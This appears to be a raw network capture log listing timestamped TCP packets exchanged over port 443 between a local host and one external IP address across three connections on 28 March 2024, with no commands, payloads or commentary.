Mar 28, 2024 20:35:05.178615093 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.178656101 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.188098907 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.188118935 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.188196898 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.256705046 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.256726027 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.256747007 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.256764889 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.256881952 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.256891012 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.256901979 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.256921053 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.256932974 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.256983995 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.256990910 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.257075071 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.257106066 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.259246111 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.259294033 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.259311914 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.259318113 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.259334087 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.259355068 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.259373903 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.259412050 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.261392117 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.262471914 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.269151926 CET	49718	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.269169092 CET	443	49718	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.312021017 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.312077999 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.312141895 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.312452078 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.312463999 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.692781925 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.692852020 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.693439960 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.693447113 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:05.693605900 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:05.693609953 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.300625086 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.300648928 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.300671101 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.300708055 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.300750971 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.300759077 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.300811052 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.386903048 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.386929035 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.387011051 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.387022018 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.387061119 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.507649899 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.507674932 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.507719040 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.507729053 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.507751942 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.507775068 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.591475964 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.591494083 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.591617107 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.591629982 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.591670036 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.658798933 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.658814907 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.659009933 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.659018993 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.659065962 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.701638937 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.701656103 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.701781034 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.701792002 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.701837063 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.738141060 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.738157034 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.738480091 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.738492012 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.738548040 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.776506901 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.776526928 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.776618958 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.776628017 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.776673079 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.805970907 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.805985928 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.806068897 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.806076050 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.806118965 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.841819048 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.841835976 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.841898918 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.841905117 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.841944933 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.874082088 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.874097109 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.874156952 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.874161959 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.874201059 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.894324064 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.894340038 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.894402981 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.894408941 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.894445896 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.915936947 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.915952921 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.916017056 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.916023970 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.916062117 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.937114954 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.937133074 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.937203884 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.937211037 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.937257051 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.955168962 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.955188990 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.955244064 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.955252886 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.955280066 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.955297947 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.972048998 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.972069979 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.972135067 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.972148895 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.972188950 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.987000942 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.987015963 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.987087965 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:06.987093925 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:06.987128019 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.001873016 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.001887083 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.001935005 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.001940966 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.001967907 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.001986027 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.015077114 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.015098095 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.015134096 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.015141010 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.015166044 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.015183926 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.029146910 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.029164076 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.029218912 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.029227972 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.029259920 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.043313980 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.043329954 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.043369055 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.043376923 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.043400049 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.043414116 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.055143118 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.055159092 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.055289030 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.055289030 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.055296898 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.055335999 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.068636894 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.068655968 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.068712950 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.068717957 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.068769932 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.080378056 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.080391884 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.080465078 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.080471039 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.080509901 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.090955019 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.090970993 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.091042995 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.091047049 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.091083050 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.101133108 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.101149082 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.101226091 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.101232052 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.101272106 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.112560987 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.112575054 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.112637997 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.112643957 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.112682104 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.122786045 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.122801065 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.122864962 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.122870922 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.122910023 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.131782055 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.131797075 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.131860971 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.131865978 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.131911039 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.141990900 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.142002106 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.142091990 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.142096996 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.142138004 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.150589943 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.150610924 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.150671959 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.150676966 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.150715113 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.159305096 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.159320116 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.159370899 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.159375906 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.159413099 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.168405056 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.168420076 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.168473005 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.168478012 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.168520927 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.176013947 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.176037073 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.176075935 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.176084042 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.176120043 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.183433056 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.183448076 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.183515072 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.183520079 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.183562994 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.193837881 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.193856955 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.193913937 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.193918943 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.193939924 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.193957090 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.201504946 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.201527119 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.201581001 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.201589108 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.201620102 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.202370882 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.202421904 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.202425957 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.202450991 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.202461958 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.202491045 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.202564001 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.202580929 CET	443	49719	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.202589035 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.202640057 CET	49719	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.237227917 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.237265110 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.237348080 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.237560034 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.237574100 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.617690086 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.617758036 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.625868082 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.625874996 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:07.626157999 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:07.626163006 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.224601030 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.224626064 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.224639893 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.224670887 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.224689960 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.224698067 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.224750042 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.310308933 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.310338020 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.310385942 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.310405016 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.310425043 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.310441971 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.431616068 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.431636095 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.431714058 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.431744099 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.431787014 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.515614033 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.515639067 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.515726089 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.515738010 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.515782118 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.582974911 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.582993984 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.583085060 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.583092928 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.583142042 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.624699116 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.624723911 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.624795914 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.624805927 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.624835968 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.624855042 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.661461115 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.661478996 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.661581993 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.661590099 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.661637068 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.699878931 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.699894905 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.699949026 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.699958086 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.699989080 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.700011969 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.729250908 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.729266882 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.729300976 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.729310989 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.729336023 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.729355097 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.764974117 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.764991045 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.765041113 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.765050888 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.765078068 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.765095949 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.795581102 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.795602083 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.795645952 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.795653105 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.795681000 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.795701027 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.817361116 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.817389011 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.817442894 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.817449093 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.817488909 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.838943005 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.838959932 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.839041948 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.839051008 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.839092016 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.860129118 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.860155106 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.860230923 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.860244989 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.860289097 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.876972914 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.876991987 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.877055883 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.877064943 CET	443	49720	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:08.877100945 CET	49720	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:08.895102024 CET	443	49720	78.46.229.36	192.168.2.6
